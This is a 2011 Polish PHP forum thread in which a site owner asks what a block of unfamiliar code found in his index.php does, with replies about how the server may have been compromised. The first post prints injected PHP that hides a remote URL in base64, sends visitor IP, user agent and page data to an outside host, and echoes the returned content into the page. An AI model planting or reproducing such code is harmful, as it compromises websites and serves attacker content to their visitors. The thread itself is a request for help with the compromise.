Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Podejrzenie włamania na serwer, Proszę o szybką pomoc
Barcelona
post 27.09.2011, 23:36:55
Post #1





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

  1. <?php
  2.  
  3. // This code use for global bot statistic
  4.  
  5. $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
  6.  
  7. $stCurlHandle = NULL;
  8.  
  9. $stCurlLink = "";
  10.  
  11. if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
  12.  
  13. {
  14.  
  15. if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
  16.  
  17. $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
  18.  
  19. $stCurlHandle = curl_init( $stCurlLink );
  20.  
  21. }
  22.  
  23. }
  24.  
  25. if ( $stCurlHandle !== NULL )
  26.  
  27. {
  28.  
  29. curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  30.  
  31. $sResult = @curl_exec($stCurlHandle);
  32.  
  33. if ($sResult[0]=="O")
  34.  
  35. {$sResult[0]=" ";
  36.  
  37. echo $sResult; // Statistic code end
  38.  
  39. }
  40.  
  41. curl_close($stCurlHandle);
  42.  
  43. }
  44.  
  45. ?>


Co to jest? Proszę o pomoc.
Go to the top of the page
+Quote Post
2 Stron V   1 2 >  
Start new topic
Odpowiedzi (1 - 19)
tabbi
post 27.09.2011, 23:55:21
Post #2





Grupa: Zarejestrowani
Postów: 150
Pomógł: 3
Dołączył: 30.10.2010

Ostrzeżenie: (0%)
-----


Ktoś zbiera dane na temat twojej strony smile.gif i wysyła do siebie - Bots vs Browsers ;]

proponuje wywołać sobie tę metodę:

  1. echo base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==');
Go to the top of the page
+Quote Post
Barcelona
post 28.09.2011, 00:03:40
Post #3





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Tutaj zostaje wysłane, ale jakim cudem ten kod znalazł się na mojej stronie ?

  1. <a href="http://rebotstat.com/botstat/stat.php" target="_blank">http://rebotstat.com/botstat/stat.php</a>


Ten post edytował Barcelona 28.09.2011, 00:06:58
Go to the top of the page
+Quote Post
tabbi
post 28.09.2011, 00:57:51
Post #4





Grupa: Zarejestrowani
Postów: 150
Pomógł: 3
Dołączył: 30.10.2010

Ostrzeżenie: (0%)
-----


Odpowiedzi na to pytanie może być wiele,

zaczynając od typowego włamania na serwer, kończąc na udostępnieniu hasła ...
Go to the top of the page
+Quote Post
Barcelona
post 28.09.2011, 01:43:53
Post #5





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Nikomu nie udostępniałem hasła, znam go tylko ja i loguje się na serwer tylko i wyłącznie z mojego komputera.
Go to the top of the page
+Quote Post
Damonsson
post 28.09.2011, 01:46:10
Post #6





Grupa: Zarejestrowani
Postów: 2 355
Pomógł: 533
Dołączył: 15.01.2010
Skąd: Bydgoszcz

Ostrzeżenie: (0%)
-----


Total Commander? ;>
Go to the top of the page
+Quote Post
Barcelona
post 28.09.2011, 02:02:17
Post #7





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Już dawno nie, WinSCP
Go to the top of the page
+Quote Post
konrados
post 2.10.2011, 12:54:04
Post #8





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----


Cytat
Total Commander?


A właściwie to o co chodzi z tym Total Commanderem, przecież ktoś musiałby się włamać na mój komp, lub wirusa bym sobie musiał ściągnąć, by ktoś pobrał hasła, prawda?

A jeśli ktoś lubi sobie ściągać wirusy, to równie dobrze może sobie zainstalować key loggera i tym samym wpisywanie hasła za każdym razem (a niezapamiętywanie ich) niewiele pomoże.

Chyba, że czegoś nie wiem?
Go to the top of the page
+Quote Post
pienso
post 2.10.2011, 13:55:55
Post #9





Grupa: Zarejestrowani
Postów: 11
Pomógł: 0
Dołączył: 2.10.2011

Ostrzeżenie: (0%)
-----


Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.
Go to the top of the page
+Quote Post
konrados
post 2.10.2011, 15:10:37
Post #10





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----


Cytat
Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.


To była złościwość? Ja naprawdę chcę się dowiedzieć o co chodzi z tymi wszystkimi ostrzeżeniami dot. Total Commandera.
Go to the top of the page
+Quote Post
drozdii07
post 2.10.2011, 15:14:52
Post #11





Grupa: Zarejestrowani
Postów: 254
Pomógł: 39
Dołączył: 6.12.2010
Skąd: localhost

Ostrzeżenie: (0%)
-----


Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają smile.gif


--------------------
Wspieram akcję "jQuery i AJAX to nie język programowania"
Go to the top of the page
+Quote Post
konrados
post 2.10.2011, 15:19:40
Post #12





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----


Cytat
Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają


Ja to wiem, ale wpierw trzeba mieć wirusa. A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.
Go to the top of the page
+Quote Post
Fifi209
post 2.10.2011, 15:53:44
Post #13





Grupa: Zarejestrowani
Postów: 4 655
Pomógł: 556
Dołączył: 17.03.2009
Skąd: Katowice

Ostrzeżenie: (0%)
-----


Cytat(konrados @ 2.10.2011, 16:19:40 ) *
A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.

Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.


--------------------
Zainteresowania: C#, PHP, JS, SQL, AJAX, XML, C dla AVR
Chętnie pomogę, lecz zanim napiszesz: Wujek Google , Manual PHP
Go to the top of the page
+Quote Post
Korab
post 2.10.2011, 16:03:31
Post #14





Grupa: Zarejestrowani
Postów: 202
Pomógł: 36
Dołączył: 10.06.2011
Skąd: Dokąd

Ostrzeżenie: (0%)
-----


To może przeskanuj sobie komputer dwoma programami antywirusowymi.
Go to the top of the page
+Quote Post
konrados
post 2.10.2011, 16:42:25
Post #15





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----


Cytat
Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.


Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.
Go to the top of the page
+Quote Post
92nasti
post 2.10.2011, 17:41:38
Post #16





Grupa: Zarejestrowani
Postów: 80
Pomógł: 1
Dołączył: 22.01.2011

Ostrzeżenie: (0%)
-----


Cytat(konrados @ 2.10.2011, 17:42:25 ) *
Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.


Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.
Go to the top of the page
+Quote Post
konrados
post 2.10.2011, 17:49:26
Post #17





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----


Cytat
Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.

ehh poddaję się, chciałem się czegoś dowiedzieć i nie wyszło. Wątek raczej do zamknięcia.
Go to the top of the page
+Quote Post
Barcelona
post 2.10.2011, 21:50:21
Post #18





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Uuuu troche mnie nie było i widzę że wątek nabrał rumieńców smile.gif

Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.
Ale i tak zastanawiają mnie dwie sprawy. Jakim prawem mogą ingerować własnym kodem w skrypcie, a po drugie te statystyki były zbierane przez stat.pl, a tutaj w tym kodzie przez jakiegoś rebotstat.

Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.

Chwilowo sprawa przycichła, ale muszę na bieżąco sprawdzać indexy, żeby sprawa się więcej nie powtórzyła.

A czy zakodowanie kodu strony coś pomoże ?
Go to the top of the page
+Quote Post
by_ikar
post 3.10.2011, 09:54:32
Post #19





Grupa: Zarejestrowani
Postów: 1 798
Pomógł: 307
Dołączył: 13.05.2009
Skąd: Gubin/Wrocław

Ostrzeżenie: (0%)
-----


Kod
Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.


Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..

Co do samej strony, sprawdź formularze, może są dziurawe w efekcie ktoś ci xss zrobił na stronie.
Go to the top of the page
+Quote Post
Barcelona
post 4.10.2011, 11:39:02
Post #20





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Cytat
Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..


Racja, nie pomyślałem o tym.

Sprawdzałem pliki i nie zauważyłem nic podejrzanego.

Ten post edytował Barcelona 4.10.2011, 11:39:21
Go to the top of the page
+Quote Post

2 Stron V   1 2 >
Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 24.07.2025 - 21:44